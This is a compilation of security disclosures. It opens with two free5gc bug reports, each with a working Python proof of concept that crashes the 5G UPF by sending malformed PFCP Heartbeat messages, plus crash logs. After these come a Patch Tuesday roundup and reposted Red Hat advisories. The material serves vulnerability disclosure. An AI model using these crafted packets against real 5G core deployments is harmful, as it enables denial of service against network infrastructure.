Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

**free5gc Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 16, 2023

GHSA-6944-6pmv-6mp2: free5gc Buffer Overflow vulnerability

\[Bugs\] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

"""
 PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero
"""
pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0c\\x00\\x00\\x02\\x00\\x00\\x60\\x00\\x00\\xe8\\x1f\\xe7\\xb4'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the IE length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version:  \\n\\tNot specify ldflags (which link version) during go build\\n\\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from \[upfcfg.yaml\]" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(\*factory.Config)(0xc0000147d0)({\\n\\tVersion: (string) (len=5) \\"1.0.3\\",\\n\\tDescription: (string) (len=31) \\"UPF initial local configuration\\",\\n\\tPfcp: (\*factory.Pfcp)(0xc00006f170)({\\n\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tNodeID: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tRetransTimeout: (time.Duration) 1s,\\n\\t\\tMaxRetrans: (uint8) 3\\n\\t}),\\n\\tGtpu: (\*factory.Gtpu)(0xc00006f320)({\\n\\t\\tForwarder: (string) (len=5) \\"gtp5g\\",\\n\\t\\tIfList: (\[\]factory.IfInfo) (len=1 cap=1) {\\n\\t\\t\\t(factory.IfInfo) {\\n\\t\\t\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\t\\t\\tType: (string) (len=2) \\"N3\\",\\n\\t\\t\\t\\tName: (string) \\"\\",\\n\\t\\t\\t\\tIfName: (string) \\"\\",\\n\\t\\t\\t\\tMTU: (uint32) 0\\n\\t\\t\\t}\\n\\t\\t}\\n\\t}),\\n\\tDnnList: (\[\]factory.DnnList) (len=1 cap=1) {\\n\\t\\t(factory.DnnList) {\\n\\t\\t\\tDnn: (string) (len=8) \\"internet\\",\\n\\t\\t\\tCidr: (string) (len=12) \\"10.60.0.0/24\\",\\n\\t\\t\\tNatIfName: (string) \\"\\"\\n\\t\\t}\\n\\t},\\n\\tLogger: (\*factory.Logger)(0xc000022e40)({\\n\\t\\tEnable: (bool) true,\\n\\t\\tLevel: (string) (len=4) \\"info\\",\\n\\t\\tReportCaller: (bool) false\\n\\t})\\n})\\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to \[info\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to \[false\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder \[gtp5g\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \\"127.0.0.8:2152\\"" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range \[6:4\]\\ngoroutine 6 \[running\]:\\nruntime/debug.Stack()\\n\\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\\npanic({0x84f480?, 0xc0001c4318?})\\n\\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\\ngithub.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\\ncreated by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start in goroutine 1\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"

CVE-2023-47345: [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero · Issue #483 · free5gc/free5gc

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.

\[Bugs\] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0f\\x00\\x00\\x00\\xff\\xff\\xff\\x00\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the total length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

2023-10-24T17:49:15.614745280+08:00 \[INFO\]\[UPF\]\[CFG\] ==================================================
2023-10-24T17:49:15.614761831+08:00 \[INFO\]\[UPF\]\[Main\] Log level is set to \[info\]
2023-10-24T17:49:15.614777264+08:00 \[INFO\]\[UPF\]\[Main\] Report Caller is set to \[false\]
2023-10-24T17:49:15.614837834+08:00 \[INFO\]\[UPF\]\[Main\] starting Gtpu Forwarder \[gtp5g\]
2023-10-24T17:49:15.614864772+08:00 \[INFO\]\[UPF\]\[Main\] GTP Address: "127.0.0.8:2152"
2023-10-24T17:49:15.650332227+08:00 \[INFO\]\[UPF\]\[BUFF\] buff netlink server started
2023-10-24T17:49:15.650439249+08:00 \[INFO\]\[UPF\]\[Perio\] perio server started
2023-10-24T17:49:15.650444691+08:00 \[INFO\]\[UPF\]\[Gtp5g\] Forwarder started
2023-10-24T17:49:15.652112097+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] starting pfcp server
2023-10-24T17:49:15.652132290+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] pfcp server started
2023-10-24T17:49:15.652138607+08:00 \[INFO\]\[UPF\]\[Main\] UPF started
2023-10-24T17:50:42.343823681+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] handleAssociationSetupRequest
2023-10-24T17:50:42.343962121+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\]\[CPNodeID:10.100.200.100\] New node
2023-10-24T17:50:42.347048969+08:00 \[FATA\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] panic: runtime error: slice bounds out of range \[6:4\]
goroutine 10 \[running\]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d
panic({0x860400, 0xc000490210})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/wmnsk/go-pfcp/ie.(\*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5
github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48
github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c
github.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e
github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc000400a90, 0xc0004030d0)
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce
created by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2

CVE-2023-47347: [Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes · Issue #496 · free5gc/free5gc

Microsoft has patched a total of 63 vulnerabilities this Patch Tuesday. Make sure you update as soon as you can.

Another important update round for this month’s Patch Tuesday. Microsoft has patched a total of 63 vulnerabilities in its operating systems. Five of these vulnerabilities qualify as zero-days, with three listed as being actively exploited. Microsoft considers a vulnerability to be a zero-day if it is publicly disclosed or actively exploited with no official fix available.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-days patched in these updates are listed as:

CVE-2023-36025: a Windows SmartScreen security feature bypass vulnerability that would allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts. SmartScreen is a built-in Windows component designed to detect and block known malicious websites and files.

It requires user interaction since the user would have to click on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file to be compromised by the attacker. Microsoft listed this vulnerability with the remark “Exploitation Detected.”

CVE-2023-36033: a Windows Desktop Window Manager (DWM) Core Library elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. This vulnerability is also listed with the remark “Exploitation Detected.”

CVE-2023-36036: a Windows Cloud Files Mini Filter Driver EoP vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. This vulnerability is also listed with the remark “Exploitation Detected.”

EoP type of vulnerabilities are typically used in attack chains. Once the attacker has gained entrance, the vulnerabilities allow them to increase their permission level.

CVE-2023-36413: a Microsoft Office security feature bypass vulnerability. Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode. Full exploitation requires that the attacker sends the target a malicious file and convince them to open it. This is a publicly disclosed vulnerability but there are no known cases of exploitation.

CVE-2023-36038: a vulnerability in ASP.NET that could lead to core denial of service. This vulnerability could be exploited if http requests to .NET 8 RC 1 running on IIS InProcess hosting model are cancelled. Threads counts would increase and an OutOfMemoryException is possible. A successful exploitation might result in a total loss of availability. So, basically an attacker would send requests and then cancel them until the program runs out of memory and crashes. Microsoft notes that this vulnerability was publicly disclosed, however no in-the-wild exploitation has been observed, which is not likely to happen either if the denial of service is the best achievable goal for an attacker.

An extra warning for organizations running Microsoft Exchange Server: Prioritize several new Exchange patches, including CVE-2023-36439, which is a vulnerability that enables attackers to install malicious software on an Exchange server.

**Other vendors**

Other organizations have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities affecting multiple Adobe products:

*   APSB23-52: Adobe ColdFusion
*   APSB23-53: Adobe RoboHelp Server
*   APSB23-54: Adobe Acrobat and Reader
*   APSB23-55: Adobe InDesign
*   APSB23-56: Adobe Photoshop
*   APSB23-57: Adobe Bridge
*   APSB23-58: Adobe FrameMaker Publishing Server
*   APSB23-60: Adobe InCopy
*   APSB23-61: Adobe Animate
*   APSB23-62: Adobe Dimension
*   APSB23-63: Adobe Media Encoder
*   APSB23-64: Adobe Audition
*   APSB23-65: Adobe Premiere Pro
*   APSB23-66: Adobe After Effects

**Android**’s November updates were released by Google.

**SAP** released its November 2023 Patch Day updates.

**SysAid** released security updates for a zero-day vulnerability that is actively being exploited by a ransomware affiliate.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

 Update now! Microsoft patches 3 actively exploited zero-days 


This external control vulnerability, if exploited, could allow a local OS-authenticated user with standard privileges to delete files with System privilege on the machine where these products are installed, resulting in denial of service.



CVE-2023-34982

Red Hat Security Advisory 2023-7215-01 - Red Hat OpenShift Service Mesh 2.2.12 Containers. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7215.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift Service Mesh Containers for 2.2.12Advisory ID:        RHSA-2023:7215-01Product:            Red Hat OpenShift Service MeshAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7215Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-39325====================================================================Summary: Red Hat OpenShift Service Mesh 2.2.12 ContainersRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39325References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2242803https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7215-01

Red Hat Security Advisory 2023-7213-01 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7213.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: squid:4 security updateAdvisory ID:        RHSA-2023:7213-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7213Issue date:         2023-11-14Revision:           01CVE Names:          CVE-2023-46846====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in HTTP Digest Authentication (CVE-2023-46847)* squid: Request/Response smuggling in HTTP/1.1 and ICAP (CVE-2023-46846)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46846References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2245910https://bugzilla.redhat.com/show_bug.cgi?id=2245916

Red Hat Security Advisory 2023-7213-01

Red Hat Security Advisory 2023-7205-01 - An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 8. Issues addressed include denial of service and traversal vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7205.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: nodejs:20 security update  
Advisory ID:        RHSA-2023:7205-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7205  
Issue date:         2023-11-14  
Revision:           01  
CVE Names:          CVE-2023-38552  
====================================================================

Summary: 

An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. 

Security Fix(es):

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* nodejs: permission model improperly protects against path traversal (CVE-2023-39331)

* nodejs: path traversal through path stored in Uint8Array (CVE-2023-39332)

* nodejs: integrity checks according to policies can be circumvented (CVE-2023-38552)

* nodejs: code injection via WebAssembly export names (CVE-2023-39333)

* node-undici: cookie leakage (CVE-2023-45143)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-38552

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2244104  
https://bugzilla.redhat.com/show_bug.cgi?id=2244413  
https://bugzilla.redhat.com/show_bug.cgi?id=2244414  
https://bugzilla.redhat.com/show_bug.cgi?id=2244415  
https://bugzilla.redhat.com/show_bug.cgi?id=2244418

Red Hat Security Advisory 2023-7205-01

Red Hat Security Advisory 2023-7177-01 - An update for bind is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7177.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: bind security updateAdvisory ID:        RHSA-2023:7177-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7177Issue date:         2023-11-14Revision:           01CVE Names:          CVE-2022-3094====================================================================Summary: An update for bind is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: flooding with UPDATE requests may lead to DoS (CVE-2022-3094)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.9 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-3094References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.9_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2164032

Red Hat Security Advisory 2023-7177-01

Red Hat Security Advisory 2023-7165-01 - An update for cups is now available for Red Hat Enterprise Linux 8. Issues addressed include buffer overflow, denial of service, and use-after-free vulnerabilities.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7165.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: cups security and bug fix updateAdvisory ID:        RHSA-2023:7165-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7165Issue date:         2023-11-14Revision:           01CVE Names:          CVE-2023-32324====================================================================Summary: An update for cups is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Common UNIX Printing System (CUPS) provides a portable printing layer for Linux, UNIX, and similar operating systems.Security Fix(es):* cups: heap buffer overflow may lead to DoS (CVE-2023-32324)* cups: use-after-free in cupsdAcceptClient() in scheduler/client.c (CVE-2023-34241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.9 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-32324References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.9_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2209603https://bugzilla.redhat.com/show_bug.cgi?id=2214914https://bugzilla.redhat.com/show_bug.cgi?id=2217955https://issues.redhat.com/browse/RHEL-2612

Tag

#dos